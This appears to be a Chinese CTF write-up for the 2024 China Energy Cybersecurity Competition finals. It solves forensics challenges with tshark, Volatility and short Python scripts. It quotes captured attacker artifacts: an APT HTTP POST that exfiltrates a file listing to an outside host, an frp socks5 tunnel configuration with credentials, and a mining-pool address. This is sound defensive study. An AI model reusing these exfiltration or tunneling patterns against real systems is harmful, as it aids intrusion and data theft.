2024中国能源网络安全大赛-②决赛 - 个人赛

失窃的 mp4 文件

眼瞎了。看不清。无法验证

flag{DSBZ_BIG_7nQv_kTAd}
flag{DSBZ_8I*J_7hQv_kTAd}
flag{DSBZ_8ltJ_7hQv_kTAd}

Done | data-encry

llc code.ll -o llvm.cpp.s
clang llvm.cpp.s -o llvm.out

得到
llvm.cpp.s
在里面找到
kqfl{xlhh-djx-qqar}
使用 Cyberchef 凯撒爆破得到
flag{sgcc-yes-llvm}

Done | 工控流量分析二

需要按 register number 进行排序, 按对应 value 组成png

"""
# 导出后前面一些行删除掉
tshark -r sample.pcap -Y "(modbus.func_code == 16) and tcp.dstport==502 && (ip.dst == 192.168.4.80)" -e "modbus.regnum16" -T fields
tshark -r sample.pcap -Y "(modbus.func_code == 16) and tcp.dstport==502 && (ip.dst == 192.168.4.80)" -e "modbus.regval_uint16" -T fields
"""
import struct

out1 = '''501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600
300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349
601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650
20,21,22,23,24,25,26,27,28,29,30
651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730
400,401,402,403,404,405,406,407,408,409,410
731,732,733,734,735,736,737,738,739,740,741
800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,866,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,899
1020,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030
950,951,952,953,954,955,956,957,958,959,960,961,962,963,964,965,966,967,968,969,970,971,972,973,974,975,976,977,978,979,980,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996,997,998,999'''

out2 = '''35152,20039,3338,6666,0,13,18760,17490,0,202,0,21,2050,0,136,28646,1280,1,43337,17473,21624,40173,39361,28356,8204,17463,22015,65431,59649,2489,7907,3108,56940,43897,10006,6619,14467,16858,41909,62994,41606,44967,4880,65305,51531,5154,31113,16932,12113,35044,9482,37308,17441,57313,60529,7293,53338,7139,65139,13632,24398,11964,6379,15832,7641,16957,39379,28610,39611,18886,26159,36901,37015,23523,60088,50288,25863,63143,46015,4715,9009,3261,35387,32311,31246,54672,34766,25393,27052,42714,29672,57140,13552,61978,6631,49860,21387,19138,15580,19688
2022,14230,24407,51417,53367,43434,45988,56534,22242,16708,26256,3965,43630,27296,31279,58771,37677,18394,62888,15466,41572,59268,62539,18159,37076,1443,63116,9402,31914,10314,640,362,25418,19391,47604,42030,35157,12299,9799,39015,21976,25878,20462,37811,13614,12607,61846,49399,49268,47255
34703,38328,25916,15313,37803,26357,6463,37827,46004,12283,58818,21306,15272,38945,56841,36045,11178,13247,48014,32635,55718,38295,55334,6854,16077,9148,26104,22653,7350,63315,53160,32306,40793,32112,21847,191,30502,31458,3525,14898,50255,51672,33909,46723,55750,11579,20347,45572,25029,28961
21704,5525,6603,23280,2557,34653,62021,49159,53649,46083,586
22986,17646,9046,22688,42952,5094,52592,6008,28361,22549,58445,25671,24235,4032,3742,62769,26282,37687,33625,50386,47775,59075,58524,56196,50982,56404,59623,31234,6129,62130,47090,26678,14569,11513,38430,24104,18732,48310,39067,5949,9144,4594,20071,28403,50272,5835,52684,39510,15880,40327,24560,54406,44102,52980,52671,59758,62162,31914,30091,21070,16366,15858,45735,59187,38276,52608,51571,28501,40351,16327,52701,19208,35838,5138,34120,24226,4297,19220,8825,35138
31233,8421,33855,27650,21086,0,0,18757,20036,44610,24706
32256,14820,53603,31138,59844,0,0,18757,20036,44610,24706
35152,20039,3338,6666,0,13,18760,17490,0,255,65280,21,2050,0,11,34589,31488,1,10825,17473,21624,40173,22737,3779,8200,54437,65535,52206,41225,24840,10090,15290,35963,29190,3768,621,22107,27429,61789,48290,5112,18340,59393,18641,912,41479,8261,3904,35358,32788,15616,10618,82,62464,42216,328,53507,28792,35946,44519,41397,18151,62439,27708,61118,50752,9275,65306,27990,57633,10202,16091,29095,37839,59718,34717,27702,60284,707,21676,62201,38919,40270,42680,47608,10248,31631,41968,61956,4805,34833,5175,58028,38762,3252,10305,48471,3392,57731,20007
31233,8421,33855,27650,21086,0,0,18757,20036,44610,24706
8144,6781,47248,36128,20925,47799,34232,15712,41049,23513,12467,45137,35669,28152,49490,48267,48864,46474,35737,13595,6752,32302,38584,61744,33721,10990,4652,23242,52213,8821,12846,60357,29151,43765,12387,39897,47789,3491,53137,28899,14713,57945,7993,24831,63201,49280,33720,5769,47340,31152'''

out1 = out1.replace('\n', ',').split(',')
out2 = out2.replace('\n', ',').split(',')

lst = [(int(a), int(b)) for a, b in zip(out1, out2) if int(a) > 500]
lst.sort(key=lambda x: x[0])
print(lst)

f = open('a.png', 'wb')
for k, v in lst:
    bt = struct.pack(">H", v)
    f.write(bt)
f.close()

Done | modbus

抓回环包 tcp 流

..........f..........l..........a..........g..........{..........s..........g..........c.        ........c.
........_..........m..........o.
........d..........b..........u..........s.........._..........h..........a..........c..........k..........}..................

flag{sgcc_modbus_hack}

Done | 寻找矿池地址

/etc/redis/redis.conf 存在可疑信息

"url": "www.baiiduu.com:3333",

Done | 这是一个秘密

tcp 流查看

..YWx3YXlzZm9...Y...2........D... ...........................................................yd2FyZCEh.

YWx3YXlzZm9yd2FyZCEh 解码得 flag

Done | 104 协议

tshark -r 104_2.pcapng -Y 'iec60870_104' -e "iec60870_asdu.ioa" -T fields | ? {$_.trim() -ne "" } > out.txt

转十进制得到

ZmxhZ3syMDI0bnlhcWdmenNsfQ==

flag{2024nyaqgfzsl}

Done | APT 窃密事件溯源

783号包

POST /abch2wdo492.php?lapc8d=Cm1vwqsu2-vdn8-2p4k-kmln-qhgq6fo305e6WDR-PC HTTP/1.1
Host: 365trade.com.cn
Content-Type: multipart/form-data; boundary=JWolzmpQvd3jAcTnoyAILrSFUN0koO6W47pvml0UVU720pncK72JQ4
Content-Length: 445
Connection: Keep-Alive

--JWolzmpQvd3jAcTnoyAILrSFUN0koO6W47pvml0UVU720pncK72JQ4
Content-Disposition: form-data; name="filvar"; filename="C:\20211101111734_error1log.txt"
Content-Type: text/plain

2.0.2.1.1.1.0.1.1.1.1.6.2.1._.C.:.\.U.s.e.r.s.\.w.d.r.\.D.e.s.k.t.o.p.\.t.e.s.t.\.8.8.8.8.8.8.8.8.8...t.x.t.|.|.2.0.2.1.1.1.0.1.1.1.0.6.2.6._.C.:.\.U.s.e.r.s.\.w.d.r.\.D.e.s.k.t.o.p.\.t.e.s.t.\.1...t.x.t.|.|.
--JWolzmpQvd3jAcTnoyAILrSFUN0koO6W47pvml0UVU720pncK72JQ4--.

C:\Users\wdr\Desktop\test\888888888.txt

flag{C:\Users\wdr\Desktop\test\888888888.txt}

Done | 损坏的图片

修复jpg图片, 显示出巨蟒⻢戏团, 等于 提示 python

图片尾部有Python Pickle反序列化数据, 画坐标点

抄个脚本

import pickle
import matplotlib.pyplot as plt

file_path = 'data'
with open(file_path, 'rb') as file:
    data = pickle.load(file)

# 提取数据中的所有点
points = [(x, i) for i, sublist in enumerate(data) for x, _ in sublist]
# 调整Y轴的⽐例,翻转图像
x_vals, y_vals = zip(*points)
adjusted_y_vals = [-y for y in y_vals]
# 绘制这些点
plt.figure(figsize=(10, 10))
plt.scatter(x_vals, adjusted_y_vals, marker='X')
plt.show()

Done | win 内存取证 3

提取内存文件列表 拿到图片

0x000000007db0fc10     16      0 R--rwd \Device\HarddiskVolume1\Users\ctf\Desktop\777.png

export file=mem.raw
vol.py -f $file --profile=Win7SP1x64 dumpfiles -Q 0x000000007db0fc10 -D ./

flag{2shygsbnajwjji}

Done | 代理流量

343 号包发现 frp

[common]
server_addr = 192.168.157.111
server_port = 8888
token=fY4e3vcrSYAHjjFKzKK8

[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = PxpYxFBdNp7
plugin_passwd = YEDSunpH
use_encryption = true
use_compression = true

flag{192.168.157.111:8888}

Done | NYWL_2024002

posted @ 2024-06-20 21:49  wgf4242  阅读(91)  评论(0编辑  收藏  举报